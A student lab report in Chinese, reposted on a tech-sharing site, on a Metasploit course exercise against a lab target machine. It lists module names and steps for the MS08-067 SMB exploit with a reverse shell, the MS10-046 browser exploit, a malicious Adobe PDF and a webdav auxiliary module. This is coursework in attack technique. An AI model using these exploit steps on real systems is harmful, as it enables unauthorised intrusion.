ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

20192407 2021-2022-2 《网络与系统攻防技术》实验六实验报告

2022-05-14 13:00:29  阅读:129  来源: 互联网

标签:use 20192407 漏洞 指令 2021 2022 使用 靶机 监听


1.实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

1.4 成功应用任何一个辅助模块。

2.实验过程

1.1一个主动攻击实践,尽量使用最新的类似漏洞;
启动msf,使用search ms08-067指令搜索漏洞

使用use exploit/windows/smb/ms08_067_netapi指令选择相应的模块
使用show payloads,set payload generic/shell_reverse_tc指令p获取靶机shell

配置rhost,lhost,lport并进行exploit监听

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
使用search ms10_046指令查找漏洞,并使用use use exploit/windows/browser/ms10_046_shortcut_icon_指令

做好相应的配置

开始监听

在靶机上打开对应的网址

使用session -i 1指令获取连接

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
使用search adobe指令进行搜素

使用use windows/fileformat/adobe_flashplayer_button指令并进行相应的配置。

将生成的pdf文件放入靶机,主机监听的同时在靶机上运行该pdf文件


1.4 成功应用任何一个辅助模块。
使用show auxiliary指令,显示所有的辅助模块

使用webdav:

3.问题及解决方案

  • 问题1:监听浏览器经常失败
  • 问题1解决方案:换了adobereader的版本

4.学习感悟、思考等

本次实验较为简单,主要是在操作msfconsole的功能,但实际操作中仍然出现不少问题,但这些问题也让我对于监听的过程和功能有了更进一步的了解,也对与自身的粗心(输错代码等问题)有了认识并加以改正。

标签:use,20192407,漏洞,指令,2021,2022,使用,靶机,监听
来源: https://www.cnblogs.com/xingjiyuan/p/16269703.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有